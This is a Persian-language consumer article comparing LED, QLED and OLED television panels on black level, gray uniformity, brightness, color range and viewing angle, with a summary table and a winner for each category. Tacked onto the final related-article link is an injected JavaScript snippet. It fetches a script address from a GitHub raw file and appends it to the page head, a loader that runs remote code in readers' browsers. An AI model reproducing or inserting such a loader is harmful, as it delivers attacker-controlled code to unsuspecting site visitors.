دسته‌بندی نشده

مقایسه تلویزیون های QLED, OLED و LED

تکنولوژی های مختلفی که امروزه در تلویزیون ها موجود است ممکن است هنگام خرید ان ها موجب سردرگمی افراد شود. نام هایی مانند OLED, QLED و LED ممکن است برای برخی از افراد نا اشنا باشد و تفاوتی در ان ها احساس نکند اما در حقیقت این سه, نوع های متفاوتی از پنل با تکنولوژی و فناوری های متفاوت هستند و کوالتی و کیفیت تصاویر در ان ها بسیار متفاوت می باشد. در این مقاله به بررسی این سه نوع از پنل تلویزیون به صورت کامل و دقیق خواهیم پرداخت. 

پنل های LED و QLED به یکدیگر شبیه هستند و در هر دو ان ها از پنل های LCD با نور LED استفاده می شوند. تنها تفاوت میان ان ها این است که در تلویزیون های QLED از لایه های کوانتومی quantum dot برای ایجاد و تولید رنج رنگی گسترده استفاده می شود. پنل های OLED کاملا متفاوت هستند, پیکسل های موجود روی این پنل به صورت فردی عمل می کنند و در مواقع مورد نیاز به صورت کاملا خودکار برای ایجاد رنگ های مشکی عمیق تر و جذاب تر خاموش می شوند.
QLED یک اصطلاح شرکتی برای نشان دادن استفاده از نقطه کوانتمی در تلویزیون ها است و برخی از کمپانی ها مانند سامسونگ و TCL به صورت رسمی از این اسم برای پنل های خود استفاده می کنند درحالی که برخی از کمپانی ها مانند هایسنس و Vizio از تکنولوژی کوانتوم دات استفاده می کنند اما نام QLED را برای پنل های خود بکار نمی برند. کمپانی ال جی از تکنولوژی کوانتوم دات در تلویزیون هایش استفاده می کند و ان ها را به عنوان QNED نام گذاری کرده است. به هر حال کمپانی ها از هر اسمی استفاده کنند همگی ان ها در دسته و کتگوری quantum dot قرار خواهند گرفت. در پنل های LED از نور های پس زمینه مشابهی استفاده می شود اما در ان ها تکنولوژی کوانتوم دات استفاده نخواهد شد.
اگرچه در پنل های OLED از یک کیفیت خاص تصویری استفاده شده است اما کوالتی و نحوه نمایش ان ها در بین مدل های مختلف متفاوت می باشد. در بین پنل های LED و QLED کوالتی تصاویر بسیار متغیر و متفاوت است و حتی در ان ها از نور های ال ای دی متفاوتی با مشخصات مختص به خود استفاده می شود. 

پنل LED ال ای دی 

در پنل های ال ای دی از قطعات نوری متفاوتی استفاده می شود. این پنل ها قبل از QLED و OLED وارد بازار تلویزیون شده اند و در ان ها از نور های ال ای دی برای روشن کردن پنل LCD استفاده می شود. اکثر تلویزیون های LED دارای پنل VA هستند بنابراین سطح کنتراست بالایی دارند و روشنایی عالی را ارائه می دهند. تلویزیون های ال ای دی رنج گسترده ای از سایز ها و مدل های مختلف را دارا می باشد. 

پنل QLED کیولد

تلویزیون های QLED از پنل LCD و نور های LED استفاده می کنند. در بین لایه های ال سی دی و نور های پس زمینه لایه های کوانتوم دات نور ها را فیلتر می کند و رنگ هایی بسیار خالص و استاندارد را تولید خواهد کرد.  QLED اصطلاحی است که در برخی از کمپانی ها مانند سامسونگ و TCL بر روی تلویزیون های کوانتوم دات استفاده می شود. 

پنل OLED اولد

در پنل های اولد هر پیکسل به صورت جداگانه عمل می کند. در این ویژگی پیکسل ها به صورت کامل خاموش می شوند و رنگ های مشکی خالصی را روی نمایشگر ایجاد خواهد کرد. در تلویزیون های OLED کوالتی عالی برای تصاویر ایجاد می شود و دارای زاویه دید گسترده می باشند. افراد زیادی با نیاز های متفاوت می توانند از این پنل استفاده کنند اما اگر می خواهید به عنوان مانیتور ان را بکار ببرید گزینه مناسبی نمی باشد. 

OLEDQLEDLED
سطح رنگ مشکیفوق العادهعالیعالی
یکنواختی خاکستریعالیمناسبمناسب
روشنایی مناسبعالیعالی
محدوده رنگ هاعالیعالیخوب
زاویه دید عالیضعیفضعیف

سطح رنگ های مشکی 

از نظر رنگ های مشکی و نسبت کنتراست پنل های کیولد و ال ای دی به دلیل استفاده از نور های پس زمینه مشابه بسیار نزدیک به یکدیگر عمل می کنند.در بسیاری از تلویزیون ها از پنل VA استفاده می شود که به نسبت کنتراست بالا و عمق رنگ های مشکی عالی معروف هستند همچنین در بیشتر مدل ها از قابلیت لوکال دیمینگ استفاده می شود که باعث عمق بیشتر سطح رنگ مشکی خواهد شد.
پنل های LCD در دو نوع مختلف VA و IPS موجود می باشند که بیشتر تلویزیون های LED و QLED از پنل VA استفاده می کنند و بیشتر پنل های IPS در تلویزیون های ال جی استفاده می شوند. پنل های VA کنتراست عالی دارند در حالی که سطح کنتراست در پنل IPS بسیار ضعیف است که نتیجه ان سطح رنگ های مشکی ضعیف و نمایش ان ها به رنگ خاکستری می باشد.
تلویزیون های OLED به دلیل عملکرد فردی پیکسل ها سطح مشکی فوق العاده ای دارند. اگر با این نمایشگر فیلمی را که قسمت های کناری ان مشکی است تماشا کنید این قسمت ها کاملا سیاه و مشکی نمایش داده می شوند. 

برنده: OLED 

یکنواختی خاکستری 

تست های یکنواختی رنگ خاکستری عملکرد تلویزیون ها را در نمایش رنگ های تکی نشان می دهد. هیچ یک از پنل های ال ای دی, کیولد و اولد در نمایش رنگ های خاکستری عملکردی عالی ندارند و در هر کدام مشکلات خاصی دیده می شود. در پنل های OLED تصاویر خاکستری از یکنواختی بهتری بهرمند هستند. تلویزیون های LED در قسمت های حاشیه ای در نمایش رنگ خاکستردی دارای عیب و ایراداتی می باشد. به دلیل مستقل بودن پیکسل های OLED یکنواختی خاکستری در ان ها بهتر از سایر پنل ها می باشد در حالی که در پنل LED به دلیل دارا بودن نور پس زمینه مشکلات و نواقص زیادی دارد. 

برنده: OLED

روشنایی

هر دو پنل LED و QLED دارای نور های پس زمینه ال ای دی برای ایجاد روشنایی می باشد بنابراین در هر دو ان ها قدرت و ضعف های مشابهی در عملکرد وجود دارد. روشنایی در این تلویزیون ها بسته به مدل ان ها متفاوت است برای مثال تلویزیون Q90T سامسونگ از تلویزیون X900H سونی روشنایی بسیار بیشتری دارد. در حالت کلی تلویزیون های OLED نسبت به LED/QLED روشنایی کمتری دارند اگرچه همانطور که گفته شد در بین مدل های مختلف متفاوت است. 

برنده: LED/QLED

گسترده رنگی 

هنگامی که تلویزیون های QLED تولید و عرضه شدند مهم ترین برتری ان ها نسبت به تلویزیون های LED توانایی ان ها در نمایش محدوده رنگی گسترده در محتویات HDR می باشد. این ویژگی هنوز برای این پنل موجود است و در محتویات HDR روی ان شاهد گسترده رنگی عالی خواهیم بود. محدوده رنگی در تلویزیون ها در حجم ان ها نیز موثر است که تعیین می کند تلویزیون چه رنگ هایی را می تواند در سطح درخشندگی متفاوت نشان دهند. تلویزیونی با حجم رنگی مناسب می تواند رنگ های روشن و تاریک را نمایش دهد. به همین دلایل است که تلویزیون های QLED نسبت به LED و OLED برتر می باشد. تلویزیون های بالا رده QLED روشنایی بسیار بالایی دارند و با ترکیب رنچ رنگی گسترده ان ها می توانند حجم رنگی مناسبی را عرضه کنند. در تلویزیون های LED نیز رنگ ها دارای حجم مناسبی هستند اما به سطح QLED نخواهند رسید. 

برنده: QLED

زاویه دید

پیکسل های تلویزیون OLED در هر زاویه ای روشنایی خوبی ارائه می دهند و زاویه دید گسترده را ارائه خواهند داد. در این پنل تصاویر در زوایا مختلف به صورت کاملا واضح نمایش داده می شوند بنابراین تلویزیون اولد گزینه مناسبی برای تماشا محتوا مختلف به صورت گروهی می باشد.
LED/QLED دارای پنل VA هستند و به طور معمول زاویه دید چندان مناسبی ندارند و تصاویر در قسمت های کناری دچار افت کیفیت خواهند بود. گرچه پنل های IPS زاویه دید گسترده ای دارند اما به دلیل نسبت کنتراست پایینی که دارد کمتر در تلویزیون ها استفاده می شود. تولید کنندگان همچنین از تکنولوژی هایی مانند زاویه دید گسترده در پنل VA استفاده می کنند که به تقویت و کمک زاویه دید در تلویزیون ها کمک می کنند. تلویزیون ها سامسونگ با استفاده از تکنولوژی اختصاصی Ultra Viewing Angle ان ها نسبت به تلویزیون های سونی زاویه دید مناسب تر و بهتری دارند. 

برنده: OLED

بررسی تلویزیون QLED سامسونگ مدل  Q60A

مقایسه تلویزیون های سامسونگ QLED مدل QN90A و سونی OLED مدل A80J

نقد و بررسی تلویزیون اولد OLED ال جی C1 (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *